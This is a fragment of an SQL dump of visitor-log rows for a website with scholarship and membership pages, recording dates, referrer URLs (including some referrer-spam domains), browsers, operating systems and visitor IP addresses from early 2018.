18-02-28','https://zphiblgz.org','MSIE','Windows','9.0','','174.128.236.102','000',6,0),(25663,'2018-02-28','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.87.233.140','000',1,0),(25664,'2018-02-28','https://zphiblgz.org','MSIE','Windows','6.0','','161.69.31.20','000',2,0),(25665,'2018-02-28','https://zphiblgz.org','MSIE','Windows','8.0','','35.162.55.4','000',2,0),(25666,'2018-02-28','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',5,0),(25667,'2018-02-28','https://zphiblgz.org','Firefox','Windows','40.1','','186.233.166.133','000',2,0),(25668,'2018-02-28','https://zphiblgz.org','MSIE','Windows','11.0','','35.162.55.4','000',2,0),(25669,'2018-02-28','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','73.213.27.103','000',5,0),(25670,'2018-02-28','https://zphiblgz.org','MSIE','Windows','7.0','','35.162.55.4','000',1,0),(25671,'2018-02-28','https://zphiblgz.org','Safari','iPhone','11.0','','73.213.27.103','000',8,0),(25672,'2018-02-28','http://atyrau.xkaz.org/','Unknown','Unknown','Unknown','','134.249.48.151','000',4,0),(25673,'2018-02-28','https://zphiblgz.org','Firefox','Windows','40.1','','79.118.139.91','000',2,0),(25674,'2018-02-28','https://zphiblgz.org','Python-urllib','Unknown','2.7','','35.162.55.4','000',3,0),(25675,'2018-02-28','http://raschtextil.com.ua/','MSIE','Windows','6.0','','46.118.116.121','000',1,0),(25676,'2018-02-28','https://zphiblgz.org','Safari','iPad','11.0','','73.213.27.103','000',1,0),(25677,'2018-02-28','http://www.google.com/','Chrome','Android','64.0.3282.123','','174.193.134.181','000',2,0),(25678,'2018-02-28','https://zphiblgz.org','Safari','iPhone','11.0','','71.244.128.30','000',2,0),(25679,'2018-02-28','http://zphiblgz.org/membership/','Firefox','Windows','38.0','','46.161.9.61','000',2,0),(25680,'2018-02-28','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.19','000',1,0),(25681,'2018-02-28','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','69.138.94.82','000',2,0),(25682,'2018-02-28','https://www.google.com/','Chrome','iPad','63.0.3239.73','','172.58.185.176','000',1,0),(25683,'2018-02-28','https://www.google.com/','Chrome','Macintosh','64.0.3282.186','','73.58.150.151','000',2,0),(25684,'2018-02-28','https://zphiblgz.org','Firefox','Windows','7.0.1','','171.25.193.77','000',3,0),(25685,'2018-02-28','http://zphiblgz.org/','MSIE','Windows','6.0','','151.237.41.52','000',2,0),(25686,'2018-02-28','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.24.98','000',1,0),(25687,'2018-02-28','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.102.23','000',2,0),(25688,'2018-02-28','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.79','000',1,0),(25689,'2018-02-28','https://zphiblgz.org','curl','Unknown','7.45.0','','32.58.34.227','000',1,0),(25690,'2018-02-28','https://zphiblgz.org','Safari','iPhone','11.0','','2.48.167.223','000',1,0),(25691,'2018-02-28','android-app://com.google.android.googlequicksearchbox','Chrome','Android','64.0.3282.137','','68.7.55.138','000',3,0),(25692,'2018-02-28','http://kipu.crimea.ua/','MSIE','Windows','6.0','','134.249.48.151','000',3,0),(25693,'2018-02-28','https://zphiblgz.org','Safari','iPhone','11.0','','51.36.230.186','000',1,0),(25694,'2018-03-01','https://zphiblgz.org','Firefox','Windows','40.1','','148.59.234.76','000',2,0),(25695,'2018-03-01','https://zphiblgz.org','Firefox','Windows','34.0','','193.106.30.99','000',1,0),(25696,'2018-03-01','https://zphiblgz.org','Firefox','Windows','40.1','','24.54.27.152','000',2,0),(25697,'2018-03-01','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.31','000',1,0),(25698,'2018-03-01','https://zphiblgz.org','Firefox','Windows','40.1','','49.205.158.170','000',2,0),(25699,'2018-03-01','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.35','000',1,0),(25700,'2018-03-01','https://www.google.com/','Safari','iPhone','604.1','','131.125.11.1','000',2,0),(25701,'2018-03-01','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','192.126.153.79','000',1,0),(25702,'2018-03-01','https://zphiblgz.org','Opera','Windows','8.50','','192.126.153.79','000',1,0),(25703,'2018-03-01','http://skinali.photo-clip.ru/','Unknown','Unknown','Unknown','','46.119.114.157','000',3,0),(25704,'2018-03-01','http://suzuki-metropolis.kiev.ua/','MSIE','Windows','6.0','','134.249.66.84','000',3,0),(25705,'2018-03-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','54.236.1.14','000',1,0),(25706,'2018-03-01','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','173.234.249.64','000',1,0),(25707,'2018-03-01','https://zphiblgz.org','Opera','Windows','8.50','','173.234.249.64','000',1,0),(25708,'2018-03-01','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.32','000',1,0),(25709,'2018-03-01','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.184.27','000',2,0),(25710,'2018-03-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','129.78.110.124','000',4,0),(25711,'2018-03-01','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.216.134','000',2,0),(25712,'2018-03-01','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.212.115','000',2,0),(25713,'2018-03-01','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.184.130','000',1,0),(25714,'2018-03-01','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.182.250','000',2,0),(25715,'2018-03-01','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.218.78','000',2,0),(25716,'2018-03-01','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.186.84','000',2,0),(25717,'2018-03-01','http://pornosemki.info/','Opera','Windows','7.54','','134.249.48.151','000',2,0),(25718,'2018-03-01','http://zphiblgz.org/','Chrome','Windows','63.0.3239.84','','188.165.4.128','000',2,0),(25719,'2018-03-01','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.31','000',1,0),(25720,'2018-03-01','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.31','000',1,0),(25721,'2018-03-01','http://site.ru','Chrome','Windows','5.0.375.99','','194.116.187.27','000',2,0),(25722,'2018-03-01','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.30','000',1,0),(25723,'2018-03-01','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwjmsIi_o8vZAhVpTt8KHYmbCfIQFggtMAE&url=https%3A%2F%2Fzphiblgz.org%2Fcause%2Fscholarship%2F&usg=AOvVaw1VKx-XgtIMhRZ0EAgDp4e-','MSIE','Windows','11.0','','198.51.197.42','000',5,0),(25724,'2018-03-01','https://zphiblgz.org','Safari','iPad','11.0','','50.225.39.88','000',5,0),(25725,'2018-03-01','https://www.google.com/','Safari','iPhone','11.0','','99.203.17.212','000',2,0),(25726,'2018-03-01','https://zphiblgz.org','Firefox','Windows','40.1','','35.165.124.185','000',1,0),(25727,'2018-03-01','https://zphiblgz.org','Firefox','Macintosh','52.0','','50.225.39.88','000',9,0),(25728,'2018-03-01','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.31','000',1,0),(25729,'2018-03-01','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',1,0),(25730,'2018-03-01','https://zphiblgz.org','Safari','iPhone','11.0','','50.225.39.87','000',18,0),(25731,'2018-03-01','http://www.feminist.org.ua/','MSIE','Windows','6.0','','178.159.37.55','000',3,0),(25732,'2018-03-01','http://sildenafil-tadalafil.info/','MSIE','Windows','6.0','','46.119.114.157','000',3,0),(25733,'2018-03-01','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','109.60.129.68','000',2,0),(25734,'2018-03-01','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.28','000',1,0),(25735,'2018-03-01','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',1,0),(25736,'2018-03-01','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.28','000',1,0),(25737,'2018-03-01','https://zphiblgz.org','MSIE','Windows','11.0','','205.254.147.8','000',7,0),(25738,'2018-03-01','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','64.118.84.22','000',1,0),(25739,'2018-03-01','https://zphiblgz.org','Firefox','Windows','40.1','','187.236.135.108','000',2,0),(25740,'2018-03-01','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.84','','50.225.39.35','000',2,0),(25741,'2018-03-01','https://zphiblgz.org','Safari','iPhone','9.0','','107.77.204.38','000',2,0),(25742,'2018-03-01','https://avtorskoe-vino.ru/','MSIE','Windows','6.0','','46.118.116.121','000',3,0),(25743,'2018-03-01','https://petrushka-restoran.ru/','MSIE','Windows','6.0','','46.118.125.21','000',4,0),(25744,'2018-03-01','https://zphiblgz.org','Firefox','Windows','40.1','','200.165.172.88','000',2,0),(25745,'2018-03-01','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',5,0),(25746,'2018-03-01','https://zphiblgz.org','Firefox','Windows','40.1','','126.203.180.31','000',2,0),(25747,'2018-03-01','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.88.67','000',1,0),(25748,'2018-03-01','http://www.yur-p.ru/','MSIE','Windows','5.5','','46.118.125.21','000',1,0),(25749,'2018-03-01','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.88.74','000',1,0),(25750,'2018-03-01','https://www.google.com/','Chrome','Windows','64.0.3282.186','','147.26.87.116','000',4,0),(25751,'2018-03-01','https://zphiblgz.org/scholarship/','AppleWebKit','Windows','534','','131.253.27.112','000',1,0),(25752,'2018-03-01','https://zphiblgz.org','Safari','iPhone','7.0','','65.55.210.171','000',1,0),(25753,'2018-03-01','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.19','000',1,0),(25754,'2018-03-01','https://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.79','000',2,0),(25755,'2018-03-01','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','100.16.228.135','000',15,0),(25756,'2018-03-01','http://zphiblgz.org/','WordPress','Unknown','Unknown','','192.0.87.226','000',2,0),(25757,'2018-03-01','https://www.google.com/','Safari','iPad','10.0','','96.86.39.174','000',3,0),(25758,'2018-03-01','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','73.213.27.103','000',7,0),(25759,'2018-03-01','https://www.google.com/','Edge','Windows','16.16299','','68.134.5.21','000',3,0),(25760,'2018-03-01','http://zphiblgz.org','Firefox','Windows','3.6.8','','95.45.252.1','000',10,0),(25761,'2018-03-01','https://www.google.com/','Safari','iPad','10.0','','69.143.253.109','000',3,0),(25762,'2018-03-01','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','71.121.167.97','000',1,0),(25763,'2018-03-02','https://zphiblgz.org/scholarship/application/','Chrome','Macintosh','64.0.3282.167','','71.121.235.184','000',1,0),(25764,'2018-03-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.27','000',4,0),(25765,'2018-03-02','http://transit.in.ua/','Opera','Windows','9.00','','46.118.116.121','000',2,0),(25766,'2018-03-02','http://metallo-konstruktsii.ru/','MSIE','Unknown','7.0b','','178.159.37.55','000',3,0),(25767,'2018-03-02','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.31','000',1,0),(25768,'2018-03-02','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.29','000',1,0),(25769,'2018-03-02','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.29','000',1,0),(25770,'2018-03-02','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.27','000',1,0),(25771,'2018-03-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.58.178.58','000',13,0),(25772,'2018-03-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','149.202.170.60','000',2,0),(25773,'2018-03-02','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.220.101.15','000',1,0),(25774,'2018-03-02','http://komp-pomosch.ru/','MSIE','Unknown','6.0','','46.119.114.157','000',3,0),(25775,'2018-03-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.37.82','000',1,0),(25776,'2018-03-02','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.27','000',1,0),(25777,'2018-03-02','http://zphiblgz.org/','Firefox','Windows','27.0','','195.22.125.74','000',3,0),(25778,'2018-03-02','https://zphiblgz.org','Safari','iPhone','11.0','','73.213.27.103','000',6,0),(25779,'2018-03-02','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','100.16.227.88','000',5,0),(25780,'2018-03-02','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.132','','68.134.12.220','000',2,0),(25781,'2018-03-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','178.209.42.84','000',1,0),(25782,'2018-03-02','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.23','000',2,0),(25783,'2018-03-02','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1713.2uCefk6NF4gzZEZngHBfoWQ1b7B7OJ92Ff_D5-OOqoeacbT2YCReQ-s9alZMx7yU.1160718bb2b704c2d2a0ea2dd07d17df35b0b6ea&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YCYBcIrWNUha-mUlBiA3OhY&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV2REMmNVN0R2VGlZYk8tX2ZmYTdLZ2RPNlNaMVhqSXh4U252TFdDRjJQZk9TdUZoWFRKQ3NWUHE1R0YwN3llNko4QjlKRjg2RWFnX18zV0ZOcnNMWjZ2X3NBU1piNUMyTQ&b64e=2&sign=cb98d42509561b85ce5062914508134e&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQa9gkHE_3kbiv2-U1fGJ4TF7adNuBl6In5riR6A06NYEmjWXvNiu-JC-4x7XdoKLJEJ0US0hVoqCqxgXEPo3WoaPrFFDcqiulKgeFvyWs7u7tVh6AlLAhAiyAhMVj-nQYtlpq-z5RND_&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXboeqr305aIM3C3DotyoEbrtY9PATNHxTfBeUFVaYlYAmBfswyUsHw7HQ_Foi3o3zh2guL7_Yi1A&l10n=ru&cts=1519999924554&mc=5.23423733922','Chrome','Windows','63.0.3239.132','','176.14.37.74','000',2,0),(25784,'2018-03-02','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','50.19.185.206','000',2,0),(25785,'2018-03-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','37.220.35.202','000',2,0),(25786,'2018-03-02','http://atyrau.xkaz.org/','MSIE','Windows','2.0d','','134.249.48.151','000',1,0),(25787,'2018-03-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.220.101.46','000',2,0),(25788,'2018-03-02','https://bonkers.name/','MSIE','Windows','6.0','','46.119.114.157','000',3,0),(25789,'2018-03-02','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.132','','96.255.95.22','000',19,0),(25790,'2018-03-02','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.32','000',1,0),(25791,'2018-03-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.220.101.13','000',1,0),(25792,'2018-03-02','https://zphiblgz.org','Chrome','Linux','47.0.2526.35','','62.210.31.177','000',2,0),(25793,'2018-03-02','https://pills24h.com/buy-dapoxetine-online-without-prescription/','MSIE','Windows','7.0b','','46.118.125.21','000',2,0),(25794,'2018-03-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','207.244.70.35','000',1,0),(25795,'2018-03-02','https://zphiblgz.org/service/breakfastonthego/','AppleWebKit','Windows','534','','65.55.210.239','000',1,0),(25796,'2018-03-02','https://zphiblgz.org','Firefox','Windows','40.1','','37.170.114.35','000',2,0),(25797,'2018-03-02','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.30','000',1,0),(25798,'2018-03-02','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.30','000',1,0),(25799,'2018-03-02','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.30','000',1,0),(25800,'2018-03-02','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.30','000',2,0),(25801,'2018-03-02','https://happysong.ru/','MSIE','Windows','6.0','','178.159.37.55','000',3,0),(25802,'2018-03-02','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',5,0),(25803,'2018-03-02','http://slomm.ru/','Opera','Windows','7.54','','46.118.116.121','000',3,0),(25804,'2018-03-02','http://www.club-lukojl.ru/','MSIE','Windows','5.5','','134.249.48.151','000',4,0),(25805,'2018-03-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.38.14.215','000',1,0),(25806,'2018-03-02','http://x-lime.net/','MSIE','Windows','6.0','','46.118.116.121','000',3,0),(25807,'2018-03-02','https://zphiblgz.org','Firefox','Windows','40.1','','197.1.53.223','000',2,0),(25808,'2018-03-02','https://zphiblgz.org','Firefox','Windows','34.0','','193.106.30.99','000',1,0),(25809,'2018-03-02','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','165.227.162.159','000',4,0),(25810,'2018-03-02','https://zphiblgz.org','Safari','Macintosh','11.0.3','','100.16.228.140','000',16,0),(25811,'2018-03-02','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1713.N-zyEAKCeaVWduvpK__JZItuCVmpXlKSuJq7Jk2oCn0LWkHyXnrGx7oKdlOwIGWj.5e90c47ee2646fcfa962e218c33996e1c935bd70&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YMkOSpatjLUqgxH-XWLwn-g&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV2REMmNVN0R2VGlmNkdLRVlvQkZZY0NUa3FpMkdyYlA3YUhoTlllZWZ0VlN5YXE2bDdBRjJIaTQ2NVlWemJRYmhYRUVtZGNBUTRYWUxpU0FlbWwxLUxMQ2tTb193S0NUWQ&b64e=2&sign=02ef240b602b45817273ac2b5f0a35a8&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQaYgAYq7JarrqF6septX8hVlT7R2TROfN4iCEbW_27Q3PIpFCguwkPY4OHu3zUwCY5IIrUAtKlpixWVp77xbCqncgsH68PaTdnjju3y1r-Xy_QtbGaEjCafQ6xeq-IHuKg&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCUano4BEc9IEWDvsc3te5klY4PSe7kNqLLC5dCT2EpSpRLJQemEej5ABa8gtRW5HGrA9OE5rvLUvg&l10n=ru&cts=1520027619164&mc=7.00726318697','MSIE','Windows','8.0','','176.14.10.12','000',1,0),(25812,'2018-03-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','171.25.193.235','000',1,0),(25813,'2018-03-02','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.186','','100.16.228.140','000',8,0),(25814,'2018-03-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.170.194','000',1,0),(25815,'2018-03-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.63.43','000',1,0),(25816,'2018-03-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.220.101.4','000',2,0),(25817,'2018-03-02','https://zphiblgz.org','Firefox','Windows','40.1','','74.83.46.133','000',2,0),(25818,'2018-03-02','https://zphiblgz.org','Firefox','Windows','40.1','','175.142.189.212','000',2,0),(25819,'2018-03-02','https://zphiblgz.org','Firefox','Windows','40.1','','109.175.101.51','000',2,0),(25820,'2018-03-02','https://www.google.co.jp/','Safari','iPad','10.0','','126.13.94.62','000',1,0),(25821,'2018-03-02','http://pornosmola.info/','MSIE','Windows','6.0','','134.249.48.151','000',1,0),(25822,'2018-03-02','http://site.ru','Chrome','Windows','5.0.375.99','','81.30.221.117','000',3,0),(25823,'2018-03-02','http://site.ru','Chrome','Windows','5.0.375.99','','194.9.94.54','000',2,0),(25824,'2018-03-02','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.9','000',1,0),(25825,'2018-03-02','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.54.42','000',2,0),(25826,'2018-03-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','91.200.165.50','000',2,0),(25827,'2018-03-02','https://zphiblgz.org','Firefox','Windows','40.1','','90.89.212.220','000',2,0),(25828,'2018-03-02','https://zphiblgz.org','Safari','iPhone','11.0','','96.244.229.165','000',5,0),(25829,'2018-03-02','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(25830,'2018-03-03','http://www.zphiblgz.org','Unknown','Unknown','Unknown','','45.55.240.186','000',19,0),(25831,'2018-03-03','https://zphiblgz.org','Firefox','Windows','7.0.1','','94.130.183.184','000',1,0),(25832,'2018-03-03','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.31','000',1,0),(25833,'2018-03-03','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.31','000',1,0),(25834,'2018-03-03','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.31','000',1,0),(25835,'2018-03-03','https://zphiblgz.org','Firefox','Windows','40.1','','60.53.114.249','000',1,0),(25836,'2018-03-03','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.67.59.131','000',2,0),(25837,'2018-03-03','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(25838,'2018-03-03','https://zphiblgz.org','Chrome','Windows','34.0.1847.137','','54.147.154.88','000',1,0),(25839,'2018-03-03','http://zphiblgz.org/','Chrome','Windows','58.0.3029.96','','109.126.204.69','000',2,0),(25840,'2018-03-03','http://site.ru','Chrome','Windows','5.0.375.99','','103.67.235.73','000',1,0),(25841,'2018-03-03','https://zphiblgz.org','MSIE','Windows','8.0','','94.142.242.84','000',2,0),(25842,'2018-03-03','https://zphiblgz.org','MSIE','Windows','8.0','','171.25.193.20','000',1,0),(25843,'2018-03-03','https://zphiblgz.org','MSIE','Windows','8.0','','88.99.33.103','000',5,0),(25844,'2018-03-03','https://zphiblgz.org','MSIE','Windows','8.0','','192.99.151.112','000',1,0),(25845,'2018-03-03','http://zphiblgz.org/scholarship/','Chrome','Windows','64.0.3282.186','','100.16.227.88','000',2,0),(25846,'2018-03-03','https://avtorskoe-vino.ru/','MSIE','Windows','6.0','','46.118.116.121','000',3,0),(25847,'2018-03-03','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.30','000',1,0),(25848,'2018-03-03','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.30','000',1,0),(25849,'2018-03-03','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.30','000',1,0),(25850,'2018-03-03','http://elementspluss.ru/','MSIE','Windows','4.01','','46.119.114.157','000',3,0),(25851,'2018-03-03','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.35','000',1,0),(25852,'2018-03-03','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.35','000',1,0),(25853,'2018-03-03','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.32','000',1,0),(25854,'2018-03-03','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','73.173.254.31','000',1,0),(25855,'2018-03-03','http://komukc.com.ua/','MSIE','Windows','6.0','','178.159.37.55','000',3,0),(25856,'2018-03-03','https://www.google.com/','Safari','Macintosh','11.0.2','','70.158.94.252','000',2,0),(25857,'2018-03-03','https://zphiblgz.org/','Chrome','Windows','64.0.3282.186','','73.213.27.103','000',3,0),(25858,'2018-03-03','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.204','000',1,0),(25859,'2018-03-03','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.220','000',1,0),(25860,'2018-03-03','https://www.google.com/','Safari','iPhone','11.0','','66.87.84.157','000',2,0),(25861,'2018-03-03','https://zphiblgz.org','Safari','iPhone','7.0','','131.253.27.2','000',1,0),(25862,'2018-03-03','https://onlywood.ru/catalog/lumber.html','MSIE','Windows','6.0','','46.118.125.21','000',3,0),(25863,'2018-03-03','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',5,0),(25864,'2018-03-03','https://zphiblgz.org','Firefox','Windows','7.0.1','','65.19.167.130','000',2,0),(25865,'2018-03-03','http://zphiblgz.org/','Firefox','Windows','7.0.1','','176.10.99.200','000',1,0),(25866,'2018-03-03','https://zphiblgz.org','Firefox','Windows','40.1','','183.82.34.222','000',2,0),(25867,'2018-03-03','https://zphiblgz.org','Firefox','Windows','7.0.1','','54.39.56.54','000',1,0),(25868,'2018-03-03','https://zphiblgz.org/','Firefox','Windows','31.0','','5.35.22.54','000',2,0),(25869,'2018-03-03','https://zphiblgz.org','Firefox','Windows','7.0.1','','178.209.42.84','000',2,0),(25870,'2018-03-03','http://zphiblgz.org/','Firefox','Windows','7.0.1','','95.130.10.69','000',1,0),(25871,'2018-03-03','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.104.120.7','000',1,0),(25872,'2018-03-03','https://zphiblgz.org','Firefox','Windows','7.0.1','','85.195.107.250','000',3,0),(25873,'2018-03-03','http://no-rx.info/','MSIE','Windows','5.5','','46.119.114.157','000',3,0),(25874,'2018-03-03','https://zphiblgz.org','Firefox','Windows','7.0.1','','193.15.16.4','000',1,0),(25875,'2018-03-03','http://site.ru','Chrome','Windows','5.0.375.99','','185.58.73.38','000',2,0),(25876,'2018-03-03','http://site.ru','Chrome','Windows','5.0.375.99','','104.154.153.163','000',1,0),(25877,'2018-03-03','http://site.ru','Chrome','Windows','5.0.375.99','','91.98.103.46','000',1,0),(25878,'2018-03-03','https://zphiblgz.org','Firefox','Windows','7.0.1','','46.165.254.166','000',2,0),(25879,'2018-03-03','http://zphiblgz.org/','Firefox','Windows','7.0.1','','87.118.116.12','000',1,0),(25880,'2018-03-03','https://zphiblgz.org','Edge','Windows','16.16299','','100.36.62.218','000',11,0),(25881,'2018-03-03','https://www.google.com/','Safari','iPhone','10.0','','71.179.107.206','000',5,0),(25882,'2018-03-03','https://zphiblgz.org','Firefox','Windows','7.0.1','','197.231.221.211','000',2,0),(25883,'2018-03-03','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.220.101.1','000',1,0),(25884,'2018-03-03','http://l.facebook.com/l.php?u=http%3A%2F%2Fwww.zphiblgz.org%2F&h=ATMhmhKCzwFEet2lomUxXjSkOfxR6XBeFz0EZjRQqBX3bWvXN3WeW-Dkp5yPbDCcdrwGnY8TjcWtYAkVESvDyCgJDa3ULHHPZCuaBtRl_MqdImzsBeZEf00OrTrJKA','Edge','Windows','16.16299','','173.252.114.114','000',2,0),(25885,'2018-03-03','https://zphiblgz.org/','Edge','Windows','16.16299','','173.252.114.119','000',1,0),(25886,'2018-03-03','https://zphiblgz.org','Firefox','Windows','7.0.1','','171.25.193.77','000',1,0),(25887,'2018-03-03','https://zphiblgz.org','Firefox','Windows','7.0.1','','87.118.116.90','000',2,0),(25888,'2018-03-03','http://zphiblgz.org/','Firefox','Windows','7.0.1','','176.10.104.243','000',1,0),(25889,'2018-03-03','https://zphiblgz.org','Firefox','Windows','7.0.1','','5.9.158.75','000',1,0),(25890,'2018-03-03','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.53.83','000',1,0),(25891,'2018-03-03','http://zphiblgz.org/','Firefox','Windows','7.0.1','','198.73.50.71','000',1,0),(25892,'2018-03-04','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','165.227.162.159','000',2,0),(25893,'2018-03-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','141.255.162.36','000',1,0),(25894,'2018-03-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.86.154','000',3,0),(25895,'2018-03-04','http://site.ru','Chrome','Windows','5.0.375.99','','80.78.244.201','000',2,0),(25896,'2018-03-04','https://zphiblgz.org','Firefox','Windows','40.1','','67.243.179.59','000',2,0),(25897,'2018-03-04','http://aktau.xkaz.org/','MSIE','Windows','6.0','','134.249.48.151','000',2,0),(25898,'2018-03-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','77.247.181.162','000',1,0),(25899,'2018-03-04','http://site.ru','Chrome','Windows','5.0.375.99','','5.56.60.123','000',1,0),(25900,'2018-03-04','http://lerporn.info/','MSIE','Windows','6.0','','178.159.37.55','000',3,0),(25901,'2018-03-04','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.29','000',1,0),(25902,'2018-03-04','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','109.226.232.8','000',1,0),(25903,'2018-03-04','https://zphiblgz.org','Firefox','Windows','34.0','','193.106.30.99','000',1,0),(25904,'2018-03-04','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','145.236.72.7','000',1,0),(25905,'2018-03-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.13.58','000',1,0),(25906,'2018-03-04','https://zphiblgz.org/scholarship/application/?gf_token=f0090e1d52824af6a626797118b317b4','Chrome','Windows','64.0.3282.186','','73.213.27.103','000',3,0),(25907,'2018-03-04','https://zphiblgz.org/scholarship/application/','Firefox','Windows','37.0','','46.161.9.56','000',3,0),(25908,'2018-03-04